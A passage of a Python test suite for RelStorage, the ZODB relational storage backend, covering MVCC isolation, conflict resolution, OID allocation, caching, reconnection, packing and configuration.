from ZODB.tests import PackableStorage
from ZODB.tests import PersistentStorage
from ZODB.tests import ReadOnlyStorage
from ZODB.tests import StorageTestBase
from ZODB.tests import Synchronization
from ZODB.tests.StorageTestBase import zodb_pickle
from ZODB.tests.StorageTestBase import zodb_unpickle
from ZODB.tests.MinPO import MinPO
from . import fakecache
from . import util
from . import mock
from . import TestCase
from . import StorageCreatingMixin
from . import skipIfNoConcurrentWriters
from .persistentcache import PersistentCacheStorageTests
from .locking import TestLocking
from .test_zodbconvert import FSZODBConvertTests
class RelStorageTestBase(StorageCreatingMixin,
TestCase,
StorageTestBase.StorageTestBase):
base_dbname = None # Override
keep_history = None # Override
_storage_created = None
def _close(self):
# Override from StorageTestBase.
# Try to avoid creating one through our _storage property.
if '_storage' in self.__dict__:
storage = self._storage
else:
storage = self._storage_created
self._storage = None
if storage is not None:
storage.close()
storage.cleanup()
def make_storage_to_cache(self):
return self.make_storage()
def get_storage(self):
# Create a storage with default options
# if it has not been created already.
storage = self._storage_created
if storage is None:
storage = self.make_storage_to_cache()
self._storage_created = storage
return storage
def set_storage(self, storage):
self._storage_created = storage
_storage = property(
lambda self: self.get_storage(),
lambda self, nv: self.set_storage(nv)
)
def open(self, read_only=False, **kwargs):
# This is used by a few ZODB tests that close and reopen the storage.
storage = self._storage
if storage is not None:
self._storage = None
storage.close()
storage.cleanup()
self._storage = storage = self.make_storage(
read_only=read_only, zap=False, **kwargs)
return storage
class StorageClientThread(MTStorage.StorageClientThread):
# MTStorage assumes that the storage object is thread safe.
# This doesn't make any sense for an MVCC Storage like RelStorage;
# don't try to use a single instance in multiple threads.
#
# This patch makes it respect that.
def __init__(self, storage, *args, **kwargs):
storage = storage.new_instance()
super(StorageClientThread, self).__init__(storage, *args, **kwargs)
def runtest(self):
try:
super(StorageClientThread, self).runtest()
finally:
self.storage.release()
self.storage = None
class ExtStorageClientThread(StorageClientThread, MTStorage.ExtStorageClientThread):
"Same as above."
class ThreadWrapper(object):
def __init__(self, storage):
self.__storage = storage
# We can't use an RLock, which verifies that the thread that
# acquired is the one that releases; check_tid_ordering_w_commit
# deliberately spreads these actions across threads (for same reason).
self.__commit_lock = threading.Lock()
rl = self.__read_lock = threading.Lock()
self.__txn = None
def make_locked(name):
meth = getattr(storage, name)
@functools.wraps(meth)
def func(*args, **kwargs):
with rl:
return meth(*args, **kwargs)
return func
for name in (
'loadBefore',
'load',
'store',
'getTid',
'lastTransaction',
):
setattr(self, name, make_locked(name))
def __getattr__(self, name):
return getattr(self.__storage, name)
def tpc_begin(self, txn):
self.__commit_lock.acquire()
self.__read_lock.acquire()
assert not self.__txn
self.__txn = txn
self.__read_lock.release()
return self.__storage.tpc_begin(txn)
def tpc_finish(self, txn, callback=None):
self.__read_lock.acquire()
assert txn is self.__txn
try:
return self.__storage.tpc_finish(txn, callback)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
def tpc_abort(self, txn):
self.__read_lock.acquire()
assert txn is self.__txn, (txn, self.__txn)
try:
return self.__storage.tpc_abort(txn)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
class UsesThreadsOnASingleStorageMixin(object):
# These tests attempt to use threads on a single storage object.
# That doesn't make sense with MVCC, where every instance is its
# own connection and doesn't need to do any locking. This mixin makes
# those tests use a special storage that locks.
@contextlib.contextmanager
def __thread_safe_wrapper(self):
orig_storage = self._storage
wrapped = self._storage = ThreadWrapper(orig_storage)
try:
yield
finally:
if self._storage is wrapped:
self._storage = orig_storage
def __generic_wrapped_test(self, meth_name):
meth = getattr(
super(UsesThreadsOnASingleStorageMixin, self),
meth_name)
try:
with self.__thread_safe_wrapper():
meth()
finally:
self._storage.zap_all(slow=True)
def make_func(name): # pylint:disable=no-self-argument
return lambda self: self.__generic_wrapped_test(name)
for bad_test in (
'check_checkCurrentSerialInTransaction',
# This one stores a b'y' (invalid pickle) into the
# database as the root object, so if we don't get zapped
# afterwards, we can't open the database.
'check_tid_ordering_w_commit',
):
locals()[bad_test] = make_func(bad_test)
del make_func
del bad_test
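# For clarity (illustrative, equivalent hand-written form): the loop above simply
# defines, for each name listed in bad_test, a method such as
#
#   def check_tid_ordering_w_commit(self):
#       self.__generic_wrapped_test('check_tid_ordering_w_commit')
#
# so the inherited test runs against a ThreadWrapper-protected storage and the
# database is zapped afterwards.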
class GenericRelStorageTests(
UsesThreadsOnASingleStorageMixin,
RelStorageTestBase,
PersistentCacheStorageTests,
TestLocking,
BasicStorage.BasicStorage,
PackableStorage.PackableStorage,
Synchronization.SynchronizedStorage,
ConflictResolution.ConflictResolvingStorage,
PersistentStorage.PersistentStorage,
MTStorage.MTStorage,
ReadOnlyStorage.ReadOnlyStorage,
):
def setUp(self):
# ZODB.tests.util.TestCase likes to change directories
# It tries to change back in tearDown(), but if there's an error,
# we may not get to tearDown. addCleanup() always runs, though.
# do that as the very last thing that happens (except for subclasses, they
# could add things first)
self.addCleanup(os.chdir, os.getcwd())
super(GenericRelStorageTests, self).setUp()
# PackableStorage is particularly bad about leaving things
# dangling. For example, if the ClientThread runs into
# problems, it doesn't close its connection, which can leave
# locks dangling until GC happens and break other threads and even
# other tests.
#
# Patch around that. Be sure to only close a given connection once,
# though.
_closing = self._closing
def db_factory(storage, *args, **kwargs):
db = _closing(DB(storage, *args, **kwargs))
db_open = db.open
def o(transaction_manager=None, at=None, before=None):
conn = db_open(transaction_manager=transaction_manager,
at=at,
before=before)
_closing(conn)
if transaction_manager is not None:
# If we're using an independent transaction, abort it *before*
# attempting to close the connection; that means it must be registered
# after the connection.
self.addCleanup(transaction_manager.abort)
return conn
db.open = o
return db
PackableStorage.DB = db_factory
self.addCleanup(setattr, MTStorage,
'StorageClientThread', MTStorage.StorageClientThread)
MTStorage.StorageClientThread = StorageClientThread
self.addCleanup(setattr, MTStorage,
'ExtStorageClientThread', MTStorage.ExtStorageClientThread)
MTStorage.ExtStorageClientThread = ExtStorageClientThread
def tearDown(self):
PackableStorage.DB = DB
super(GenericRelStorageTests, self).tearDown()
def _make_readonly(self):
# checkWriteMethods in ReadOnlyStorage assumes that
# the object has an undo() method, even though that's only
# required if it's IStorageUndoable, aka history-preserving.
super(GenericRelStorageTests, self)._make_readonly()
storage = self._storage
if not hasattr(storage, 'undo'):
def undo(*args, **kwargs):
raise ReadOnlyError
storage.undo = undo # pylint:disable=attribute-defined-outside-init
return storage
def checkCurrentObjectTidsRoot(self):
# Get the root object in place
db = self._closing(DB(self._storage))
conn = self._closing(db.open())
storage = conn._storage
cursor = storage._load_connection.cursor
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, [0])
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# Ask for many, many objects that don't exist.
# Force the implementation to loop if that's what it does internally.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(0, 3523))
self.assertEqual(1, len(oid_to_tid))
self.assertIn(0, oid_to_tid)
# No matching oids.
oid_to_tid = storage._adapter.mover.current_object_tids(cursor, range(1, 3523))
self.assertEqual(0, len(oid_to_tid))
conn.close()
db.close()
def checkLen(self):
# Override the version from BasicStorage because we
# actually do guarantee to keep track of the counts,
# within certain limits.
# len(storage) reports the number of objects.
# check it is zero when empty
self.assertEqual(len(self._storage), 0)
# check it is correct when the storage contains two objects.
# len may also be zero, for storages that do not keep track
# of this number
self._dostore(data=PersistentMapping())
self._dostore(data=PersistentMapping())
self._storage._adapter.stats.large_database_change()
self.assertEqual(len(self._storage), 2)
def checkDropAndPrepare(self):
# Under PyPy, this test either takes a very long time (PyMySQL)
# or hangs (psycopg2cffi) longer than I want to wait (10+ minutes).
# This suggests there's a lock on a particular table (the eighth table we drop)
# which in turn suggests that there are connections still open and leaked!
# Running a manual GC seems to fix it. It's hard to reproduce manually because
# it seems to depend on a particular set of tests being run.
import gc
gc.collect()
gc.collect()
self._storage._adapter.schema.drop_all()
self._storage._adapter.schema.prepare()
def checkCrossConnectionInvalidation(self):
# Verify connections see updated state at txn boundaries
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['myobj'] = 'yes'
c2 = db.open()
r2 = c2.root()
self.assertNotIn('myobj', r2)
storage = c1._storage
t = transaction.Transaction()
t.description = u'invalidation test'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
self.assertNotIn('myobj', r2)
c2.sync()
self.assertIn('myobj', r2)
self.assertEqual(r2['myobj'], 'yes')
finally:
db.close()
def checkCrossConnectionIsolation(self):
# Verify MVCC isolates connections
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = PersistentMapping()
r1['gamma'] = PersistentMapping()
transaction.commit()
# Open a second connection but don't load root['alpha'] yet
c2 = db.open()
r2 = c2.root()
r1['alpha']['beta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 1'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
# The second connection will now load root['alpha'], but due to
# MVCC, it should continue to see the old state.
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertFalse(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
# make root['alpha'] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertTrue(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
self.assertEqual(r2['alpha']['beta'], 'yes')
# Repeat the test with root['gamma']
r1['gamma']['delta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 2'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
# The second connection will now load root['gamma'], but due to MVCC,
# it should continue to see the old state.
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertFalse(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
# make root['gamma'] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertTrue(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
self.assertEqual(r2['gamma']['delta'], 'yes')
finally:
db.close()
def checkResolveConflictBetweenConnections(self, clear_cache=False):
# Verify that conflict resolution works between storage instances
# bound to connections.
obj = ConflictResolution.PCounter()
obj.inc()
# Establish a polling state; dostoreNP won't.
self._storage.poll_invalidations()
oid = self._storage.new_oid()
revid1 = self._dostoreNP(oid, data=zodb_pickle(obj))
self._storage.poll_invalidations()
# These will both poll and get the state for (oid, revid1)
# cached at that location, where it will be found during conflict
# resolution.
storage1 = self._storage.new_instance()
storage1.load(oid, '')
storage2 = self._storage.new_instance()
storage2.load(oid, '')
# Remember that the cache stats are shared between instances.
# The first had to fetch it, the second can use it.
__traceback_info__ = storage1._cache.stats()
self.assertEqual(storage1._cache.stats()['hits'], 1)
storage1._cache.reset_stats()
if clear_cache:
storage1._cache.clear(load_persistent=False)
self.assertEqual(storage1._cache.stats()['hits'], 0)
obj.inc()
obj.inc()
# The effect of committing two transactions with the same
# pickle is to commit two different transactions relative to
# revid1 that add two to _value.
root_storage = self._storage
try:
def noConflict(*_args, **_kwargs):
self.fail("Should be no conflict.")
storage1.tryToResolveConflict = noConflict
self._storage = storage1
_revid2 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# This one had no conflicts and did no cache work
self.assertEqual(storage1._cache.stats()['hits'], 0)
self.assertEqual(storage1._cache.stats()['misses'], 0)
# This will conflict; we will prefetch everything through the cache,
# or database, and not the storage's loadSerial.
def noLoadSerial(*_args, **_kwargs):
self.fail("loadSerial on the storage should never be called")
storage2.loadSerial = noLoadSerial
self._storage = storage2
_revid3 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# We don't actually update cache stats at all, however,
# despite the prefetching.
cache_stats = storage1._cache.stats()
__traceback_info__ = cache_stats, clear_cache
self.assertEqual(cache_stats['misses'], 0)
self.assertEqual(cache_stats['hits'], 0)
data, _serialno = self._storage.load(oid, '')
inst = zodb_unpickle(data)
self.assertEqual(inst._value, 5)
finally:
storage1.close()
storage2.close()
self._storage = root_storage
def checkResolveConflictBetweenConnectionsNoCache(self):
# If we clear the cache, we can still loadSerial()
self.checkResolveConflictBetweenConnections(clear_cache=True)
def check16KObject(self):
# Store 16 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * 1024
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _ = self._storage.load(oid, '')
self.assertIsInstance(got, bytes)
self.assertEqual(got, data)
self.assertEqual(len(got), len(data))
def check16MObject(self):
# Store 16 * 1024 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * (1024 * 1024)
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def check99X1900Objects(self):
# Store 99 objects each with 1900 bytes. This is intended
# to exercise possible buffer overfilling that the batching
# code might cause.
data = b'0123456789012345678' * 100
t = transaction.Transaction()
self._storage.tpc_begin(t)
oids = []
for _ in range(99):
oid = self._storage.new_oid()
self._storage.store(oid, b'\0'*8, data, '', t)
oids.append(oid)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
for oid in oids:
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def checkPreventOIDOverlap(self):
# Store an object with a particular OID, then verify that
# OID is not reused.
data = b'mydata'
oid1 = b'\0' * 7 + b'\x0f'
self._dostoreNP(oid1, data=data)
oid2 = self._storage.new_oid()
oid1_int = bytes8_to_int64(oid1)
oid2_int = bytes8_to_int64(oid2)
self.assertGreater(
oid2_int, oid1_int,
'old OID %r (%d) should be less than new OID %r (%d)'
% (oid1, oid1_int, oid2, oid2_int))
def checkNoDuplicateOIDsManyThreads(self):
# Many threads in many storages can allocate OIDs with
# no duplicates or overlaps.
# https://github.com/zodb/relstorage/issues/283
from itertools import combinations
thread_count = 11
oids_per_segment = 578
segment_count = 3
total_expected_oids = oids_per_segment * segment_count
oids_by_thread = [list() for _ in range(thread_count)]
def allocate_oids(thread_storage, thread_num):
conn_pool = thread_storage._store_connection_pool
store_conn = conn_pool.borrow()
try:
allocator = thread_storage._oids
my_oids = oids_by_thread[thread_num]
for _ in range(segment_count):
my_oids.extend(
bytes8_to_int64(thread_storage.new_oid())
for _ in range(oids_per_segment)
)
# Periodically call set_min_oid, like the storage does,
# to check for interference.
with conn_pool.borrowing() as store_conn:
allocator.set_min_oid(store_conn, my_oids[-1])
store_conn.commit()
finally:
self.assertLessEqual(conn_pool.pooled_connection_count, len(threads))
thread_storage.release()
threads = [threading.Thread(target=allocate_oids,
args=(self._storage.new_instance(), i))
for i in range(thread_count)]
for t in threads:
t.start()
for t in threads:
t.join(99)
# All of them are released, so we should be down to only one instance.
self.assertEqual(1, self._storage._store_connection_pool.instance_count)
self.assertLessEqual(self._storage._store_connection_pool.pooled_connection_count, 1)
# They all have the desired length, and each one has no duplicates.
self.assertEqual(
[len(s) for s in oids_by_thread],
[total_expected_oids for _ in range(thread_count)]
)
self.assertEqual(
[len(s) for s in oids_by_thread],
[len(set(s)) for s in oids_by_thread]
)
# They are all disjoint
for a, b in combinations(oids_by_thread, 2):
__traceback_info__ = a, b
a = set(a)
b = set(b)
self.assertTrue(a.isdisjoint(b))
# They are all monotonically increasing.
for s in oids_by_thread:
self.assertEqual(
s,
sorted(s)
)
def checkUseCache(self):
# Store an object, cache it, then retrieve it from the cache
self._storage = self.make_storage(
cache_servers='x:1 y:2',
cache_module_name=fakecache.__name__,
cache_prefix='zzz',
)
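# fakecache stands in for a real memcache client module: 'x:1 y:2' becomes the two
# server addresses asserted below, and 'zzz' prefixes every cache key.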
fakecache.data.clear()
db = DB(self._storage)
try:
c1 = db.open()
self.assertEqual(
c1._storage._cache.cache.g.client.servers,
['x:1', 'y:2'])
r1 = c1.root()
# The root state and checkpoints should now be cached.
# A commit count *might* be cached depending on the ZODB version.
# (Checkpoints are stored in the cache for the sake of tests/monitoring,
# but aren't read.)
# self.assertIn('zzz:checkpoints', fakecache.data)
# self.assertIsNotNone(db.storage._cache.polling_state.checkpoints)
self.assertEqual(sorted(fakecache.data.keys())[-1][:10],
'zzz:state:')
r1['alpha'] = PersistentMapping()
transaction.commit()
cp_count = 1
if self.keep_history:
item_count = 2
else:
# The previous root state was automatically invalidated
# XXX: We go back and forth on that.
item_count = 2
item_count += cp_count
self.assertEqual(len(fakecache.data), item_count)
oid = r1['alpha']._p_oid
c1._storage.load(oid, '')
# Came out of the cache, nothing new
self.assertEqual(len(fakecache.data), item_count)
# make a change
r1['beta'] = 0
transaction.commit()
# Once again, history free automatically invalidated.
# XXX: Depending on my mood.
item_count += 1
self.assertEqual(len(fakecache.data), item_count)
c1._storage.load(oid, '')
# try to load an object that doesn't exist
self.assertRaises(KeyError, c1._storage.load, b'bad.oid.', '')
finally:
db.close()
def checkMultipleStores(self):
# Verify a connection can commit multiple transactions
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = 1
transaction.commit()
r1['alpha'] = 2
transaction.commit()
finally:
db.close()
def checkLongTransactionDescription(self):
# Don't trip over long transaction descriptions
db = DB(self._storage)
try:
c = db.open()
r = c.root()
r['key'] = 1
transaction.get().note(u'A long description. ' * 1000)
transaction.commit()
finally:
db.close()
def checkAutoReconnect(self):
# Verify auto-reconnect
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
# Going behind its back.
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
# ZODB5 implicitly calls sync
# immediately when a connection is opened;
# fake that here for older releases.
c2 = db.open()
self.assertIs(c2, c1)
c2.sync()
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta']) # Calling new_oid outside of TPC
transaction.commit()
c2.close()
del c1
del c2
def checkAutoReconnectOnSync(self):
# Verify auto-reconnect.
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
c1._storage._load_connection.connection.close()
c1._storage.sync(True)
# ZODB5 calls sync when a connection is opened. Our monkey
# patch on a Connection makes sure that works in earlier
# versions, but we don't have that patch on ZODB5. So test
# the storage directly. NOTE: The load connection must be open
# to trigger the actual sync.
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
c2 = db.open()
self.assertIs(c2, c1)
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta'])
transaction.commit()
c2.close()
del c1
del c2
def checkCachePolling(self):
storage2 = self.make_storage(zap=False)
db = DB(self._storage)
db2 = DB(storage2)
try:
# Set up the database.
tm1 = transaction.TransactionManager()
c1 = db.open(transaction_manager=tm1)
r1 = c1.root()
r1['obj'] = obj1 = PersistentMapping({'change': 0})
tm1.commit()
# Load and change the object in an independent connection.
tm2 = transaction.TransactionManager()
c2 = db2.open(transaction_manager=tm2)
r2 = c2.root()
r2['obj']['change'] = 1
tm2.commit()
# Now c2 has delta_after0.
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
c2.close()
# Change the object in the original connection.
c1.sync()
obj1['change'] = 2
tm1.commit()
# Close the database connection to c2.
c2._storage._load_connection.drop()
self.assertFalse(c2._storage._load_connection)
# Make the database connection to c2 reopen without polling.
c2._storage.load(b'\0' * 8, '')
self.assertTrue(c2._storage._load_connection)
# Open a connection, which should be the same connection
# as c2.
c3 = db2.open(transaction_manager=tm2)
self.assertTrue(c3 is c2)
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
# Clear the caches (but not delta_after*)
c3._resetCache()
c3._storage._cache.cache.flush_all()
obj3 = c3.root()['obj']
# Should have loaded the new object.
self.assertEqual(obj3['change'], 2)
finally:
db.close()
db2.close()
def checkDoubleCommitter(self):
# Verify we can store an object that gets committed twice in
# a single transaction.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['dc'] = DoubleCommitter()
transaction.commit()
conn2 = db.open()
self.assertEqual(conn2.root()['dc'].new_attribute, 1)
conn2.close()
finally:
transaction.abort()
conn.close()
finally:
db.close()
def checkHistoryWithExtension(self):
# Verify the history method works with transactions that have
# extended info.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['pi'] = 3.14
transaction.get().setExtendedInfo("digits", 3)
transaction.commit()
history = self._storage.history(conn.root()._p_oid)
self.assertEqual(len(history), 1)
if self.keep_history:
self.assertEqual(history[0]['digits'], 3)
finally:
conn.close()
finally:
db.close()
def checkPackBatchLockNoWait(self):
# Holding the commit lock doesn't interfere with packing.
#
# TODO: But what about row locking? Let's add a test
# that begins a commit and locks some rows and then packs.
self._storage = self.make_storage(pack_batch_timeout=0)
adapter = self._storage._adapter
test_conn, test_cursor = adapter.connmanager.open_for_store()
db = self._closing(DB(self._storage))
try:
# add some data to be packed
c = self._closing(db.open())
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
del r['alpha']
transaction.commit()
# Pack, with a commit lock held
now = packtime = time.time()
while packtime <= now:
packtime = time.time()
adapter.locker.hold_commit_lock(test_cursor)
self._storage.pack(packtime, referencesf)
adapter.locker.release_commit_lock(test_cursor)
finally:
db.close()
adapter.connmanager.close(test_conn, test_cursor)
def checkPackKeepNewObjects(self):
# Packing should not remove objects created or modified after
# the pack time, even if they are unreferenced.
db = DB(self._storage)
try:
# add some data to be packed
c = db.open()
extra1 = PersistentMapping()
c.add(extra1)
extra2 = PersistentMapping()
c.add(extra2)
transaction.commit()
# Choose the pack time to be that last committed transaction.
packtime = c._storage.lastTransactionInt()
extra2.foo = 'bar'
extra3 = PersistentMapping()
c.add(extra3)
transaction.commit()
self.assertGreater(c._storage.lastTransactionInt(), packtime)
self._storage.pack(packtime, referencesf)
# extra1 should have been garbage collected
self.assertRaises(KeyError,
self._storage.load, extra1._p_oid, '')
# extra2 and extra3 should both still exist
self._storage.load(extra2._p_oid, '')
self._storage.load(extra3._p_oid, '')
finally:
db.close()
def checkPackBrokenPickle(self):
# Verify the pack stops with the right exception if it encounters
# a broken pickle.
# Under Python 2, with zodbpickle, there may be a difference depending
# on whether the accelerated implementation is in use. Also, the pure-Python
# version on PyPy can raise IndexError.
from zodbpickle.pickle import UnpicklingError as pUnpickErr
unpick_errs = (pUnpickErr, IndexError)
try:
from zodbpickle.fastpickle import UnpicklingError as fUnpickErr
except ImportError:
pass
else:
unpick_errs += (fUnpickErr,)
self._dostoreNP(self._storage.new_oid(), data=b'brokenpickle')
self.assertRaises(unpick_errs, self._storage.pack,
time.time() + 10000, referencesf)
def checkBackwardTimeTravelWithoutRevertWhenStale(self):
# If revert_when_stale is false (the default), when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# raise a ReadConflictError.
self._storage = self.make_storage(revert_when_stale=False)
db = DB(self._storage)
try:
c = db.open()
c._storage._adapter.poller.transactions_may_go_backwards = True
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
# Snapshot the database.
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
# Change data in it.
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
# Revert the data.
# We must use a separate, unrelated storage object to do this,
# because our storage object is smart enough to notice that the data
# has been zapped and revert caches for all connections and
# ZODB objects when we invoke this API.
storage_2 = self.make_storage(zap=False)
storage_2.zap_all(reset_oid=False, slow=True)
storage_2.copyTransactionsFrom(fs)
storage_2.close()
del storage_2
fs.close()
del fs
finally:
shutil.rmtree(d)
# Sync, which will call poll_invalidations().
c.sync()
# Try to load an object, which should cause ReadConflictError.
r._p_deactivate()
with self.assertRaises(ReadConflictError):
r.__getitem__('beta')
finally:
db.close()
def checkBackwardTimeTravelWithRevertWhenStale(self):
# If revert_when_stale is true, when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# invalidate all objects that have changed in the interval.
self._storage = self.make_storage(revert_when_stale=True)
db = DB(self._storage)
try:
transaction.begin()
c = db.open()
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
transaction.begin()
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
c._storage.zap_all(reset_oid=False, slow=True)
c._storage.copyTransactionsFrom(fs)
fs.close()
finally:
shutil.rmtree(d)
# r should still be in the cache.
self.assertTrue('beta' in r)
# Now sync, which will call poll_invalidations().
c.sync()
# r should have been invalidated
self.assertEqual(r._p_changed, None)
# r should be reverted to its earlier state.
self.assertFalse('beta' in r)
finally:
db.close()
@util.skipOnAppveyor("Random failures")
# https://ci.appveyor.com/project/jamadden/relstorage/build/1.0.75/job/32uu4xdp5mubqma8
def checkBTreesLengthStress(self):
# BTrees.Length objects are unusual Persistent objects: they
# have a conflict resolution algorithm that cannot fail, so if
# we do get a failure it's due to a problem with us.
# Unfortunately, tryResolveConflict hides all underlying exceptions
# so we have to enable logging to see them.
from relstorage.adapters.interfaces import UnableToAcquireLockError
from ZODB.ConflictResolution import logger as CRLogger
from BTrees.Length import Length
import BTrees
from six import reraise
def log_err(*args, **kwargs): # pylint:disable=unused-argument
import sys
reraise(*sys.exc_info())
CRLogger.debug = log_err
CRLogger.exception = log_err
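# Replacing the logger's debug/exception methods with log_err makes any exception that
# tryResolveConflict would normally log and swallow propagate immediately, turning a
# hidden conflict-resolution failure into a test error. The original methods are
# restored via the del statements at the end of this test.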
updates_per_thread = 50
thread_count = 4
lock_errors = []
self.maxDiff = None
db = DB(self._storage)
try:
c = db.open()
try:
root = c.root()
root['length'] = Length()
# XXX: Eww! On MySQL, if we try to take a shared lock on
# OID 0, and a write lock on OID 1, we fail with a deadlock
# error. It seems that taking the shared lock on 0 also takes a shared
# lock on 1 --- somehow. Because they're adjacent to each other?
# I don't know. We have to add some space between them to be sure
# that doesn't happen. On MySQL 5.7, just 10 extra items was enough.
# On MySQL 8, we had to add more.
for i in range(50):
root[i] = BTrees.OOBTree.BTree() # pylint:disable=no-member
transaction.commit()
except:
transaction.abort()
raise
finally:
c.close()
def updater():
for _ in range(updates_per_thread):
thread_c = db.open()
__traceback_info__ = thread_c._storage
try:
# Perform readCurrent on an object not being modified.
# This adds stress to databases that use separate types of locking
# for modified and current objects. It was used to discover
# bugs in gevent+MySQL and plain MySQLdb against both 5.7 and 8.
root = thread_c.root()
root._p_activate() # unghost; only non-ghosts can readCurrent
root._p_jar.readCurrent(root)
root['length'].change(1)
time.sleep(random.random() * 0.05)
try:
transaction.commit()
except UnableToAcquireLockError as e:
lock_errors.append((type(e), str(e)))
transaction.abort()
raise
finally:
thread_c.close()
threads = []
for _ in range(thread_count):
t = threading.Thread(target=updater)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join(120)
self.assertEqual(lock_errors, [])
c = db.open()
try:
self.assertEqual(c.root()['length'](),
updates_per_thread * thread_count)
finally:
transaction.abort()
c.close()
finally:
db.close()
del CRLogger.debug
del CRLogger.exception
def checkAfterCompletion(self):
# The afterCompletion method, which can only be called
# outside of two-phase commit, is otherwise equivalent to calling
# tpc_abort.
from ZODB.interfaces import IMVCCAfterCompletionStorage
self._storage = self.make_storage(revert_when_stale=False)
with mock.patch.object(self._storage._load_connection,
'rollback_quietly') as rb:
self._storage.afterCompletion()
rb.assert_called_with()
self.assertTrue(
IMVCCAfterCompletionStorage.providedBy(self._storage))
def checkConfigureViaZConfig(self):
replica_fn = None
replica_conf = ''
if util.DEFAULT_DATABASE_SERVER_HOST == util.STANDARD_DATABASE_SERVER_HOST:
replica_fn = self.get_adapter_zconfig_replica_conf()
if replica_fn:
replica_conf = 'replica-conf ' + self.get_adapter_zconfig_replica_conf()
conf = u"""
%import relstorage
<zodb main>
<relstorage>
name xyz
read-only false
keep-history {KEEP_HISTORY}
{REPLICA_CONF}
blob-dir .
blob-cache-size-check-external true
blob-cache-size 100MB
blob-chunk-size 10MB
cache-local-dir-read-count 12
cache-local-dir-write-max-size 10MB
{ADAPTER}
</relstorage>
</zodb>
""".format(
KEEP_HISTORY='true' if self.keep_history else 'false',
REPLICA_CONF=replica_conf,
ADAPTER=self.get_adapter_zconfig()
)
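# Note: blob-chunk-size 10MB corresponds to the 10485760 (10 * 1024 * 1024) bytes
# asserted against storage._options.blob_chunk_size further down.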
__traceback_info__ = conf
schema_xml = u"""
<schema>
<import package="ZODB"/>
<section type="ZODB.database" name="main" attribute="database"/>
</schema>
"""
import ZConfig
from io import StringIO
from ZODB.interfaces import IBlobStorageRestoreable
from relstorage.adapters.interfaces import IRelStorageAdapter
from relstorage.blobhelper.interfaces import ICachedBlobHelper
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
schema = ZConfig.loadSchemaFile(StringIO(schema_xml))
config, _ = ZConfig.loadConfigFile(schema, StringIO(conf))
db = config.database.open()
try:
storage = db.storage
